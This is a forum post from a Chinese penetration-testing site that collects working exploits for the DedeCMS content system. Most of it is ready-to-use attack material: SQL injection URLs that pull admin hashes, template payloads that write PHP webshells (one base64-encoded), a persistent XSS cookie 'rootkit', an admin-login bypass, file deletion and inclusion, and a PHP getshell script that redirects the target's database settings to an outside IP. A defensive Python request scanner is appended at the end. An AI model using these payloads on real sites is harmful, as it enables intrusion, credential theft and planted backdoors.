中国网络渗透测试联盟

Title: DedeCMS vulnerability summary

Author: admin    Posted: 2012-10-18 10:42
DedeCMS 5.6 RSS injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCMS v5.6 embedded malicious code execution vulnerability
Register a member account and upload a software item; in the local address field enter: a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the item executes it.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This creates x.php with password xiao, directly generating a one-line shell.

DedeCMS 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DedeCMS (all versions) gotopage variable XSS vulnerability
1. Copy and paste the URL below and visit it; this triggers the XSS and installs the XSS rootkit. Note that IE8/9 and similar browsers block URL-based XSS, so their XSS filter has to be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="0 ?$ E+ E& y% @6 H# {' {
2. Close the browser; afterwards, visiting any of the URLs below in any way triggers our XSS.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php
DedeCMS (织梦) variable override getshell
#!usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.comwww.webvul.com
');
echo "\r\n";
if($argv[2]==null){
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].'
www.site.com 1 old
+---------------------------------------------------------------------------+
');
    exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
    echo "
Exploit Success \n";
    if($aid==1)echo "
Shell:".$url."/$path/data/cache/fuck.php\n" ;
    if($aid==2)echo "
Shell:".$url."/$path/fuck.php\n" ;
    if($aid==3)echo "
Shell:".$url."/$path/plus/fuck.php\n";
}else{
    echo "
Exploit Failed \n";
}
function Getshell($url,$aid,$path){
    $id=$aid;
    $host=$url;
    $port="80";
    $content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    $data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    $data .= "Host: ".$host."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data .= "Connection: keep-alive\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content."\r\n";
    $ock=fsockopen($host,$port);
    if (!$ock) {
        echo "
No response from ".$host."\n";
    }
    fwrite($ock,$data);
    while (!feof($ock)) {
        $exp=fgets($ock, 1024);
        return $exp;
    }
}
?>

DedeCMS v5.6-5.7 privilege bypass vulnerability (direct entry into the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
Change validate=dcug above to the current captcha value and you enter the site backend directly.

This vulnerability requires first obtaining the backend path.

DedeCMS (织梦) tag remote file write vulnerability
Precondition: you must have your own dede database ready, then insert a row: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
Then submit with the form below; the shell appears as 1.php in the same directory. Work out the mechanism yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

DedeCMS <= V5.6 Final template execution vulnerability
1. Register a user, enter the member backend, publish an article and upload an image; then, in attachment management, replace the image with our crafted template. For example, the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (if the image format is restricted, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>

<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)

<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)

<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)

<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(这里构造)
</div>

<!-- form action area -->
<h3 class="meTitle">详细内容</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>

</div>

</form>

Submit; if it reports that the edit succeeded, we have changed the template path.
3. Visit the edited article. Assuming the article just edited has aid 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is created in the plus directory.

DedeCMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save this as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>
Construct the form above; after upload the image is saved as /uploads/userup/3/1.gif
Publish an article, then construct the edit form as follows:
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

DedeCMS (织梦) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

DedeCMS (织梦) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../

DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 and the last 7 characters removed, giving a 20-character MD5; to get the 16-character MD5 from that, remove 3 more characters from the front and 1 from the end.

DedeCMS (织梦) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

DedeCMS (织梦) select_soft_post.php uninitialized page variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>
DedeCMS (织梦) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
It exploits a MySQL numeric field overflow that raises an error, combined with DedeCMS recording database error messages in a PHP file without validating the file header.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message is displayed.
2. Visit
http://www.abc.com/data/mysql_error_trace.php; seeing the following output confirms the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run test.html from dede.rar; note that the form's action address is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
If, after pressing OK, you see the output from step 2, the trojan file was uploaded successfully.

DedeCMS (织梦) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
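Added here as a defender-side example (not part of the original post and not DedeCMS code): a Python triage scanner modelled on the URLs and forms in this list, flagging GLOBALS/cfg_ variable-override parameter names, raw SQL handed to plus/advancedsearch.php, {dede:} template tags with runphp in parameters or in uploaded "images", ../ in path parameters, SQL keywords in values, and markup in gotopage. The hostnames, addresses and sample requests are constructed.

```python
"""Triage of the DedeCMS request patterns collected in this post (added example).

Rules are derived from the URLs and forms above; hosts and addresses are constructed.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Parameter names a client must never be allowed to register as server variables.
OVERRIDE_NAME = re.compile(r"^(?:GLOBALS|cfg_|_GET|_POST|_COOKIE|_REQUEST|_SERVER)", re.I)
TEMPLATE_TAG = re.compile(r"\{/?dede:", re.I)
RUNPHP = re.compile(r"runphp\s*=\s*['\"]?yes", re.I)
SQL_KEYWORDS = re.compile(r"\bunion\s+select\b|\bupdatexml\s*\(|\bselect\b.+\bfrom\b", re.I)
TRAVERSAL = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")
MARKUP = re.compile(r'<\s*script|"\s*>\s*<', re.I)
# Parameters the post shows carrying file paths (edit_face, carbuyaction, article_edit, select_soft_post).
PATH_PARAMS = {"oldface", "code", "templet", "activepath", "cfg_basedir"}


def flag_request(url, body=""):
    """Return the sorted rule names triggered by one request: a URL plus an optional
    application/x-www-form-urlencoded POST body. parse_qsl percent-decodes names, so
    _COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D is seen as _COOKIE[GLOBALS][cfg_dbhost]."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True) + parse_qsl(body, keep_blank_values=True)
    hits = set()
    if parts.path.lower().endswith("/advancedsearch.php") and any(n == "sql" for n, _ in params):
        hits.add("raw-sql")
    for name, value in params:
        if OVERRIDE_NAME.match(name) or "[GLOBALS]" in name.upper():
            hits.add("globals-override")
        if TEMPLATE_TAG.search(value) or RUNPHP.search(value):
            hits.add("template-tag")
        if SQL_KEYWORDS.search(name) or SQL_KEYWORDS.search(value):
            hits.add("sqli")
        if name in PATH_PARAMS and TRAVERSAL.search(value):
            hits.add("traversal")
        if name == "gotopage" and MARKUP.search(value):
            hits.add("xss")
    return sorted(hits)


def scan_upload(data):
    """True when an uploaded file that claims to be an image carries a DedeCMS template
    tag that would run PHP: Gif89a{dede:field ... runphp='yes'} or a {dede:php} block."""
    text = data.decode("latin-1")  # byte-preserving decode; only ASCII tags are searched
    return bool(TEMPLATE_TAG.search(text) and (RUNPHP.search(text) or "{dede:php}" in text.lower()))


# Constructed samples modelled on the URLs in the post (hosts replaced, last one benign).
SAMPLE_REQUESTS = [
    "http://cms.example/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`",
    "http://cms.example/dede/login.php?dopost=login&userid=admin&pwd=x&_POST[GLOBALS][cfg_dbhost]=203.0.113.5",
    "http://cms.example/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif",
    "http://cms.example/plus/feedback_js.php?arcurl='%20union%20select%201,userid,pwd%20from%20dede_admin",
    "http://cms.example/dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E",
    "http://cms.example/plus/list.php?tid=1",
]
SAMPLE_BODY = ("doaction=http%3A%2F%2Fcms.example%2Fplus%2Fmytag_js.php%3Faid%3D1"
               "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=203.0.113.5&nocache=true")

if __name__ == "__main__":
    for u in SAMPLE_REQUESTS:
        print(flag_request(u) or ["clean"], u)
    print(flag_request("http://cms.example/plus/mytag_js.php?aid=1", SAMPLE_BODY))
    print(scan_upload(b"GIF89a{dede:field name='toby57' runphp='yes'}phpinfo();{/dede:field}"))
```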

Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2